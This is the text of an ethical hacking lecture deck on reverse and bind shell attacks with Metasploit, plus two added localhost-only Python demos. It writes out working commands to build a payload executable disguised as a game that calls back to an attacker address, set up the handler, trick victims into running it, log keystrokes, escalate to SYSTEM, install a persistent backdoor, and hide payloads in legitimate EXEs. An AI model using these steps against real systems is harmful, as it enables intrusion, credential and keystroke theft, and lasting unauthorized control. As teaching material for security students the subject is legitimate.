Cyber Security and Ethical hacking 16
1. Cyber Security & Ethical Hacking
By Mehedi Hasan
Lecture 16:
Reverse & Bind Shell Attacks
2. Meterpreter
Post Exploitation Attacks
Important Terminology
Exploit:
An exploit is code, or a technique, that takes advantage of a security flaw on
the victim's computer to gain unauthorized access.
Payloads:
A payload is the code the attacker runs on the victim's computer once the
system has been compromised. A reverse shell payload is one example.
Post Exploitation Attack:
The actions the attacker carries out against a system after it has been
compromised, in order to control it (for example capturing keystrokes,
escalating privileges, or installing persistence).
Listener:
A listener is code that runs on the attacker's computer and waits for an
incoming connection from the victim's computer (in Metasploit this is the
exploit/multi/handler module).
3. Shell
A shell is a command-line interface on a system that lets a user interact with
the system by typing text commands, for example the Command Prompt in Windows
and the Terminal in Kali Linux.
4. Reverse Shell Attack
A reverse shell attack forces the victim's computer to connect back to the
attacker and give the attacker remote shell access to it.
Reverse shells have the additional advantage that they let the attacker reach a
victim that sits behind a firewall or NAT, or that only has an internal
(private) IP address. This works because in a reverse shell the victim makes an
outgoing connection, instead of the attacker having to make an incoming one. The
caveat is that the outgoing connection still has to be allowed by the victim's
egress filtering, which is why attackers often choose ports such as 443 that
are usually open outbound.
Typically, in a reverse shell attack the attacker follows these steps:
Step 1: Infect a regular file with a payload (msf)
Step 2: Open a port on the attacker's computer and listen for an incoming
connection from the victim (msf)
Step 3: Send the infected file to the victim and somehow get them to execute
it (social engineering)
5. Meterpreter
• Introduction: Meterpreter is a payload that is part of Metasploit and lets
the attacker communicate with the victim's system after it has been exploited.
Its most useful property is that it runs from memory: the small executable that
is run on the victim only connects back, and the actual Meterpreter code is
sent over that connection and injected into a process on the victim's
computer, so it does not have to be written to disk as a file. Everything it
does afterwards (keystroke capture, process migration, privilege escalation,
persistence) is driven by commands and scripts from the attacker's side.
Post Exploitation Attacks
6. Meterpreter
Reverse Shell Access: Steps Involved
Step 1: Backdoor file
Backdoor a file and infect it with exploit code and a payload
(exe, pdf, doc, xls).
Step 2: Listener
Launch the listener on your computer.
Step 3: Exploitation
Send the infected file to the victim and somehow make them execute it.
Step 4: Shell Access
Wait for the reverse shell connection to get established between the victim
and the attacker.
Step 5: Post Exploitation
Control the victim's computer with post exploitation scripts.
7. Meterpreter
Post Exploitation Attacks
Step 1: Backdoor file (msf)
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=4444 X > /root/Desktop/nfs.exe
(Options are separated by spaces, not commas, and X selects Windows executable
output. msfpayload was removed from Metasploit in 2015; its replacement,
msfvenom, takes the payload with -p, the output format with -f exe and the
output file with -o.)
Step 2: Listener (in msfconsole)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.15
set LPORT 4444
exploit
(set takes a space between the option and its value, not an equals sign. LPORT
must match the LPORT built into the payload; 4444 is the default.)
Step 3: Exploitation (Social Engineering)
Step 4: Shell Access
Get Meterpreter shell access.
Step 5: Post Exploitation.
8. Meterpreter
Post Exploitation Attacks
Different ways to get a Meterpreter session
• Send the victim an infected executable file.
• Send the victim an infected PDF that exploits a vulnerability in Adobe
Acrobat/Reader on the victim.
• Send the victim a link to a page that exploits a browser vulnerability.
• Send the victim a link to a web page that exploits a Java vulnerability.
9. Remote Shell Attack
Using an infected EXE file
Requirements
• The victim is running Windows 7.
• The attacker has Metasploit.
10. Meterpreter
Post Exploitation Attacks
Step 1: Hide the reverse shell payload in, say, a game such as NFS.exe. When
executed on the victim's system, this reverse shell payload connects back to
the attacker on port 4444 at IP address 192.168.100.15.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=4444 X > /root/Desktop/nfs.exe
Step 2: Start Metasploit (msfconsole) and type the following commands to
launch the multi/handler module and tell it which payload to expect and on
which address and port:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.15
set LPORT 4444
exploit
Step 3: Metasploit now starts the payload handler and waits for a reverse
shell connection to be established from the victim's machine to the
attacker's on port 4444.
11. Meterpreter
Post Exploitation Attacks
Step 4: Somehow send the nfs.exe file to the victim and fool the victim into
executing it on the Windows 7 system.
Step 5: You have now successfully connected to the victim's computer, and a
Meterpreter session has been created between attacker and victim. To double
check, type the sysinfo command; it reports the victim's computer name, OS
version and architecture.
Step 6: To get a command prompt on the victim's computer, simply type the
shell command: shell
Step 7: You can now browse the victim's computer just as if it were your own.
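The staged delivery that sits behind the listener in slides 7 and 10, and the in-memory property claimed on slide 5, as an added example that is not part of the lecture and is not Metasploit's own code: a Python model of the reverse_tcp staging handshake run on 127.0.0.1. The stage bytes are constructed, the ephemeral local port stands in for LPORT 4444, and nothing is executed. The point is the 4-byte length prefix the handler sends before the stage, and the receive loop a stager needs so that a stage split across many TCP segments still arrives intact in memory.

```python
"""Model of the staged reverse_tcp handshake behind exploit/multi/handler.

Added example, not from the lecture and not Metasploit's code. The executable
run on the victim (nfs.exe above) is only a small stager: it connects back and
then receives the real Meterpreter code, the "stage", over the same connection,
length-prefixed, and copies it into memory. The stage is never written to the
victim's disk, which is the in-memory property described on slide 5. Here the
stage is constructed bytes and is only held in memory, never executed.
"""
import socket
import struct
import threading

# Constructed stand-in for the stage; a real stage is a DLL of several hundred KB.
FAKE_STAGE = bytes(range(256)) * 40          # 10240 bytes, deliberately not text


def frame_stage(stage: bytes) -> bytes:
    """Handler side: a 4-byte little-endian length, then the stage itself."""
    return struct.pack("<I", len(stage)) + stage


def recv_exact(conn: socket.socket, n: int) -> bytes:
    """Read exactly n bytes. TCP may deliver a stage in many small segments, so
    a single recv() would hand back a truncated, unusable stage."""
    buf = bytearray()
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)


def receive_stage(conn: socket.socket) -> bytes:
    """Stager side: read the length prefix, then exactly that many bytes."""
    (length,) = struct.unpack("<I", recv_exact(conn, 4))
    return recv_exact(conn, length)


def run_staging_demo(stage: bytes = FAKE_STAGE, chunk_size: int = 700):
    """Handler listens, stager connects back, handler pushes the framed stage in
    deliberately small writes. Returns (stage held in stager memory, segments sent)."""
    handler = socket.socket()
    handler.bind(("127.0.0.1", 0))           # ephemeral port stands in for LPORT 4444
    handler.listen(1)
    host, port = handler.getsockname()
    sent = []

    def handler_thread():
        conn, _ = handler.accept()
        handler.close()
        with conn:
            framed = frame_stage(stage)
            for i in range(0, len(framed), chunk_size):
                conn.sendall(framed[i:i + chunk_size])
                sent.append(1)

    t = threading.Thread(target=handler_thread)
    t.start()
    with socket.create_connection((host, port)) as stager:   # the connect-back
        in_memory_stage = receive_stage(stager)
    t.join()
    return in_memory_stage, len(sent)


def run_truncated_demo() -> bool:
    """Failure mode: the handler dies after announcing a 4096-byte stage but
    sending only 3 bytes. Returns True if the stager detects the short stage."""
    handler_end, stager_end = socket.socketpair()
    handler_end.sendall(struct.pack("<I", 4096) + b"MZ\x90")
    handler_end.close()
    try:
        receive_stage(stager_end)
        return False
    except ConnectionError:
        return True
    finally:
        stager_end.close()


if __name__ == "__main__":
    stage, segments = run_staging_demo()
    print(f"stager holds {len(stage)} bytes in memory, delivered in {segments} "
          f"segments, intact: {stage == FAKE_STAGE}")
    print("truncated stage detected:", run_truncated_demo())
```

Running the script shows the 10 KB constructed stage arriving in 15 segments and being reassembled by the stager without anything touching disk. run_truncated_demo is the case a naive stager gets wrong: one that trusted a single recv() would try to run 3 bytes of a 4096-byte stage, which is why the length prefix and the read-until-complete loop are part of the design.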
12. Post Exploitation Scripts
List of existing scripts available
http://dev.metasploit.com/redmine/projects/framework/repository/shell-script/metrepreter
19. Meterpreter existing script
Migrating to some other process: migrate 912
Migrates the Meterpreter session into the process whose PID is 912, in this
case explorer.exe (use ps to list processes and their PIDs). Keystroke capture
with keyscan only sees input for the desktop session of the process Meterpreter
is running in, so migrating into the logged-on user's explorer.exe first is
what makes the victim's keystrokes capturable.
20. Meterpreter existing script
Start a keylogger on the victim's computer:
run post/windows/capture/keylog_recorder
Starts a keylogger on the victim's system and records all keystrokes to a loot
file on the attacker's machine.
21. Meterpreter existing script
Start a keylogger on the victim's computer:
keyscan_start
keyscan_dump
keyscan_stop
Starts the keylogger on the victim's computer, dumps the keylogger buffer (run
keyscan_dump periodically while it is capturing) and then stops the keylogger.
24. Meterpreter existing script
Privilege escalation on the victim's system
getsystem
Tries to elevate the session to NT AUTHORITY\SYSTEM using several built-in
techniques (named pipe impersonation, token duplication). These techniques
need an already elevated (administrator) session; from a normal user's
process, or one held back by UAC, getsystem fails and a local privilege
escalation exploit module is needed instead.
getuid
Tells you which user you are currently running as on the victim's system
(run it before and after getsystem to confirm the elevation).
41. Remote Shell Attack
Once you have shell access to the victim's computer, ideally you want to leave
a backdoor open, so that you have easy access to it in the future as well.
Meterpreter has a persistence.rb script that installs a Meterpreter agent on
the victim's computer, so that the attacker can get back in even after it has
been rebooted.
Once you have Meterpreter shell access on the victim, type the commands below.
run persistence -h
Displays the available options.
run persistence -U -i 5 -p 443 -r 192.168.100.1
-U starts the agent whenever the user logs on (-X starts it at boot instead,
which requires an elevated session), -i 5 makes it retry the connection every
5 seconds, and -p 443 / -r 192.168.100.1 are the port and address of the
attacker's handler, which must therefore be listening for the same payload
(windows/meterpreter/reverse_tcp) on 192.168.100.1:443 whenever the victim
comes back up. Now even when the victim shuts the computer down, you get a
Meterpreter session again whenever the victim turns it on and logs in. Note
that, unlike the in-memory Meterpreter stage, the script writes a VBScript to
the victim's disk and adds a registry Run key, so it leaves artifacts that
antivirus and a forensic examiner can find. In current Metasploit the script
has been deprecated in favour of the exploit/windows/local/persistence module.
43. Bind Shell vs Reverse Shell
Bind Shell:
It is possible to bind an application to a particular port in such a way that
whenever a user connects to that port, the user gets shell access to the victim.
The attacker has to connect to the victim on the specified port to get access
to the shell.
Easy for a firewall to stop: the connection is inbound to the victim, so NAT, a
perimeter firewall, or the host firewall blocking unsolicited inbound
connections defeats it, and the open listening port is visible in a port scan.
Reverse Shell:
It is possible to create a payload in such a way that, when executed on the
victim, it connects to the attacker and gives shell access.
The victim connects back to the attacker, giving the attacker a reverse shell.
Hard for a firewall to stop: the connection is outbound from the victim, which
most firewalls allow, so it is only caught by egress filtering or by inspecting
the outbound traffic.
45. Meterpreter
Bind Shell Access: Steps Involved
Step 1: Backdoor file
Backdoor a file and infect it with exploit code and a bind shell payload
(exe, pdf, doc, xls), for example windows/meterpreter/bind_tcp.
Step 2: Exploitation
Send the infected file to the victim and somehow make them execute it.
Step 3: Listener
The payload binds itself to a particular port on the victim and listens for a
connection from the attacker.
Step 4: Shell Access
The attacker connects to the victim on that port (with exploit/multi/handler
set to the same bind payload and RHOST pointing at the victim).
Step 5: Post Exploitation
Control the victim's computer with post exploitation scripts and commands.
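The connection direction that slides 4, 43 and 45 describe, as an added example that is not part of the lecture and is not Metasploit code: a Python script that runs both topologies on 127.0.0.1 and shows that the two sides exchange exactly the same commands; the only difference is which end calls connect() and which end listens. The "victim" side is a toy interpreter that answers a fixed set of commands (sysinfo, getuid, echo) with constructed strings and executes nothing on the host, and the ephemeral local ports stand in for LPORT 4444.

```python
"""Reverse shell vs bind shell: who connects to whom.

Added example, not from the lecture and not Metasploit code. Both topologies
run on 127.0.0.1 in threads. The "victim" side is a toy interpreter that
answers a fixed set of commands with constructed strings; it does NOT execute
operating system commands, so only the connection direction is real.
"""
import socket
import threading

# Constructed answers so the demo runs offline and is not a usable shell.
TOY_ANSWERS = {
    "sysinfo": "Computer: VICTIM-PC  OS: Windows 7 (constructed)",
    "getuid": "Server username: VICTIM-PC\\alice (constructed)",
}


def handle_command(cmd: str) -> str:
    """Toy 'shell': map a command line to a reply instead of executing it."""
    cmd = cmd.strip()
    if cmd in TOY_ANSWERS:
        return TOY_ANSWERS[cmd]
    if cmd.startswith("echo "):
        return cmd[5:]
    return f"unknown command: {cmd}"


def serve_shell(conn: socket.socket) -> None:
    """Victim side, identical for both topologies: read one command line, send
    one reply line, stop on 'exit'. Only who called connect() differs."""
    with conn, conn.makefile("rb") as rf:
        for raw in rf:
            cmd = raw.decode().rstrip("\r\n")
            if cmd == "exit":
                break
            conn.sendall((handle_command(cmd) + "\n").encode())


def drive_shell(conn: socket.socket, commands) -> list:
    """Attacker side: send each command, collect one reply line per command."""
    replies = []
    with conn, conn.makefile("rb") as rf:
        for cmd in commands:
            conn.sendall((cmd + "\n").encode())
            replies.append(rf.readline().decode().rstrip("\r\n"))
        conn.sendall(b"exit\n")
    return replies


def run_reverse_shell_demo(commands) -> list:
    """Reverse shell: the ATTACKER listens (exploit/multi/handler) and the
    VICTIM connects out, so the only connection leaving the victim is outbound."""
    handler = socket.socket()
    handler.bind(("127.0.0.1", 0))          # ephemeral port stands in for LPORT 4444
    handler.listen(1)
    lhost, lport = handler.getsockname()

    def victim():
        serve_shell(socket.create_connection((lhost, lport)))   # connect back

    t = threading.Thread(target=victim)
    t.start()
    conn, _ = handler.accept()
    handler.close()
    replies = drive_shell(conn, commands)
    t.join()
    return replies


def run_bind_shell_demo(commands) -> list:
    """Bind shell: the VICTIM opens a listening port and the ATTACKER connects
    in. That inbound connection to a new port is what NAT, a perimeter firewall
    or the host firewall normally blocks, and a port scan can see the port."""
    victim_sock = socket.socket()
    victim_sock.bind(("127.0.0.1", 0))      # stands in for the bind payload's LPORT
    victim_sock.listen(1)
    vhost, vport = victim_sock.getsockname()

    def victim():
        conn, _ = victim_sock.accept()
        victim_sock.close()
        serve_shell(conn)

    t = threading.Thread(target=victim)
    t.start()
    replies = drive_shell(socket.create_connection((vhost, vport)), commands)
    t.join()
    return replies


if __name__ == "__main__":
    cmds = ["sysinfo", "getuid", "echo hello from the attacker"]
    print("reverse:", run_reverse_shell_demo(cmds))
    print("bind:   ", run_bind_shell_demo(cmds))
```

Both demos return the same replies for the same commands, which is the point of slide 43: the shell itself is identical, and the firewall difference comes entirely from which side opens the listening socket. Replacing the toy handle_command with a real subprocess call is what turns this into an actual shell, which is why the example deliberately does not do that.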
48. Backdooring an EXE file with a payload
It is possible to generate an EXE file carrying a payload (reverse or bind
shell) with the help of msfpayload:
msfpayload <payload> LHOST=<ip> LPORT=<port> X > <output file name>
For example:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.12 LPORT=4444 X > /root/Desktop/NFS.exe
Note that this produces a fresh executable containing only the payload; it is
not the original game. To embed the payload in an existing, working EXE so
that the original program still runs (a true backdoor), use msfvenom with
-x <template.exe> and -k, which keeps the template's original behaviour and
runs the payload in a separate thread. msfpayload itself was removed from
Metasploit in 2015 in favour of msfvenom.